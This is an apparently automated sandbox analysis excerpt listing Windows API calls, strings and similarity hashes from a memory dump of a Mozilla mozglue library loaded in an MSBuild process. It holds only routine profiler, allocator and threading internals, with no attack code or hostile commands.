                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: GetCurrentThreadId.KERNEL32 ref: 6C8CDE73
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C894A68), ref: 6C8CDE7B
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C894A68), ref: 6C8CDEB8
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: free.MOZGLUE(00000000,?,6C894A68), ref: 6C8CDEFE
                                                                                                                                                                                                                        • Part of subcall function 6C8CDE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C8CDF38
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: GetCurrentProcess.KERNEL32(?,6C8831A7), ref: 6C8BCBF1
                                                                                                                                                                                                                        • Part of subcall function 6C8BCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8831A7), ref: 6C8BCBFA
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEF1E
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEF2B
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEF59
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEFB0
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEFBD
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CEFE1
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CEFF8
                                                                                                                                                                                                                      • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8CF000
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C8C94EE
                                                                                                                                                                                                                        • Part of subcall function 6C8C94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C8C9508
                                                                                                                                                                                                                      • ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C8CF02F
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8CF09B
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C8CF0AC
                                                                                                                                                                                                                        • Part of subcall function 6C8CF070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C8CF0BE
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_pause, xrefs: 6C8CF008
                                                                                                                                                                                                                      • [I %d/%d] profiler_stop, xrefs: 6C8CEED7
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
                                                                                                                                                                                                                      • String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90E804), ref: 6C8BD047
                                                                                                                                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6C8BD093
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C8BD0A6
                                                                                                                                                                                                                      • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C90E810,00000040), ref: 6C8BD0D0
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E7B8,00001388), ref: 6C8BD147
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E744,00001388), ref: 6C8BD162
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E784,00001388), ref: 6C8BD18D
                                                                                                                                                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(6C90E7DC,00001388), ref: 6C8BD1B1
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
                                                                                                                                                                                                                      • String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CFADC
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CFAE9
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CFB31
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8CFB43
                                                                                                                                                                                                                      • ??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C8CFBF6
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(6C90F4B8), ref: 6C8CFC50
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • [I %d/%d] profiler_unregister_thread() - thread %llu already unregistered, xrefs: 6C8CFD15
                                                                                                                                                                                                                      • [D %d/%d] profiler_unregister_thread: %s, xrefs: 6C8CFC94
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$D@std@@ExclusiveLockMarkerTextU?$char_traits@V?$allocator@V?$basic_string@$AcquireBlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@Index@1@Marker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Options@1@ProfileProfilerReleaseStringView@
                                                                                                                                                                                                                      • String ID: [D %d/%d] profiler_unregister_thread: %s$[I %d/%d] profiler_unregister_thread() - thread %llu already unregistered
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895E9D
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B85
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: EnterCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5B90
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: LeaveCriticalSection.KERNEL32(6C90F688,?,?,?,6C8A56EE,?,00000001), ref: 6C8A5BD8
                                                                                                                                                                                                                        • Part of subcall function 6C8A5B50: GetTickCount64.KERNEL32 ref: 6C8A5BE4
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C895EAB
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C895EB8
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C895ECF
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C896017
                                                                                                                                                                                                                        • Part of subcall function 6C884310: moz_xmalloc.MOZGLUE(00000010,?,6C8842D2), ref: 6C88436A
                                                                                                                                                                                                                        • Part of subcall function 6C884310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C8842D2), ref: 6C884387
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000004), ref: 6C895F47
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C895F53
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 6C895F5C
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C895F66
                                                                                                                                                                                                                      • DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C895F7E
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000024), ref: 6C895F27
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C895E8C
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C89605D
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C8955E1), ref: 6C8960CC
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
                                                                                                                                                                                                                      • String ID: GeckoMain
                                                                                                                                                                                                                      • API String ID: 3711609982-966795396
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C883217
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C883236
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: FreeLibrary.KERNEL32 ref: 6C88324B
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: __Init_thread_footer.LIBCMT ref: 6C883260
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C88327F
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C88328E
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832AB
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832D1
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8832E5
                                                                                                                                                                                                                        • Part of subcall function 6C8831C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C8832F7
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C899675
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C899697
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C8996E8
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C899707
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C89971F
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899773
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C8997B7
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997D0
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C8997EB
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C899824
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
                                                                                                                                                                                                                      • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                                                                                                                                                      • API String ID: 3361784254-3880535382
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E768,?,00003000,00000004), ref: 6C883AC5
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E768,?,00003000,00000004), ref: 6C883AE5
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00000000,00008000,?,00003000,00000004), ref: 6C883AFB
                                                                                                                                                                                                                      • VirtualFree.KERNEL32(?,00100000,00004000), ref: 6C883B57
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C883B81
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883BA3
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E7B8), ref: 6C883BAE
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7B8), ref: 6C883C74
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C883C8B
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883C9F
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E7B8), ref: 6C883D5C
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90E784), ref: 6C883D67
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90E784), ref: 6C883D8A
                                                                                                                                                                                                                        • Part of subcall function 6C8C0D60: VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C883DEF), ref: 6C8C0D71
                                                                                                                                                                                                                        • Part of subcall function 6C8C0D60: VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C883DEF), ref: 6C8C0D84
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$Leave$Enter$Virtual$Free$Alloc
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>$MOZ_CRASH()
                                                                                                                                                                                                                      • API String ID: 2380290044-2272602182
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C898007
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C89801D
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C89802B
                                                                                                                                                                                                                      • K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C89803D
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C89808D
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C89809B
                                                                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C8980B9
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C8980DF
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8980ED
                                                                                                                                                                                                                      • wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C8980FB
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C89810D
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C898133
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C898149
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C898167
                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C89817C
                                                                                                                                                                                                                      • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C898199
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2721933968-0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32,00000084), ref: 6C891213
                                                                                                                                                                                                                      • toupper.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C891285
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32,00000076), ref: 6C8912B9
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(?,CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32,00000078,?), ref: 6C891327
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32, xrefs: 6C89120D
                                                                                                                                                                                                                      • CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32, xrefs: 6C89131B
                                                                                                                                                                                                                      • TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32, xrefs: 6C8912AD
                                                                                                                                                                                                                      • &, xrefs: 6C89126B
                                                                                                                                                                                                                      • MZx, xrefs: 6C8911E1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$toupper
                                                                                                                                                                                                                      • String ID: &$CLSID\{03022430-ABC4-11D0-BDE2-00AA001A1953}\InProcServer32$Interface\{618736E0-3C3D-11CF-810C-00AA00389B71}\ProxyStubClsid32$MZx$TypeLib\{1EA4DBF0-3C3B-11CF-810C-00AA00389B71}\1.1\0\win32
                                                                                                                                                                                                                      • API String ID: 403083179-3658087426
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C883217
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C883236
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 6C88324B
                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 6C883260
                                                                                                                                                                                                                      • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C88327F
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C88328E
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832AB
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8832D1
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C8832E5
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C8832F7
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: EnterCriticalSection.KERNEL32(6C90E370,?,?,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284), ref: 6C8BAB94
                                                                                                                                                                                                                        • Part of subcall function 6C8BAB89: LeaveCriticalSection.KERNEL32(6C90E370,?,6C8834DE,6C90F6CC,?,?,?,?,?,?,?,6C883284,?,?,6C8A56F6), ref: 6C8BABD1
                                                                                                                                                                                                                      • __aulldiv.LIBCMT ref: 6C88346B
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Time$StampV01@@Value@mozilla@@$CriticalLibrarySectionStamp@mozilla@@$AddressCreation@EnterFreeInit_thread_footerLeaveLoadNow@ProcProcessV12@V12@___aulldiv
                                                                                                                                                                                                                      • String ID: KernelBase.dll$QueryInterruptTime
                                                                                                                                                                                                                      • API String ID: 3006643210-2417823192
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • InitializeCriticalSection.KERNEL32(6C90F618), ref: 6C8E6694
                                                                                                                                                                                                                      • GetThreadId.KERNEL32(?), ref: 6C8E66B1
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8E66B9
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,00000100), ref: 6C8E66E1
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(6C90F618), ref: 6C8E6734
                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6C8E673A
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(6C90F618), ref: 6C8E676C
                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 6C8E67FC
                                                                                                                                                                                                                      • memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C8E6868
                                                                                                                                                                                                                      • RtlCaptureContext.NTDLL ref: 6C8E687F
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
• Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
                                                                                                                                                                                                                      • String ID: WalkStack64
                                                                                                                                                                                                                      • API String ID: 2357170935-3499369396
                                                                                                                                                                                                                      • Opcode ID: 40977d62a2479afbf19ff1872799596af9092bd45e92f9ab89a96ab23bcfd565
                                                                                                                                                                                                                      • Instruction ID: 0031a9cd2b8fbc400b12322bfc61a45a063feafae21e49be60329ed477147fc9
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 40977d62a2479afbf19ff1872799596af9092bd45e92f9ab89a96ab23bcfd565
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DB51AB71A09305AFDB21CF25CA44B5ABBF4FF8A714F10492DFA9887640D770E908CB92
                                                                                                                                                                                                                      APIs
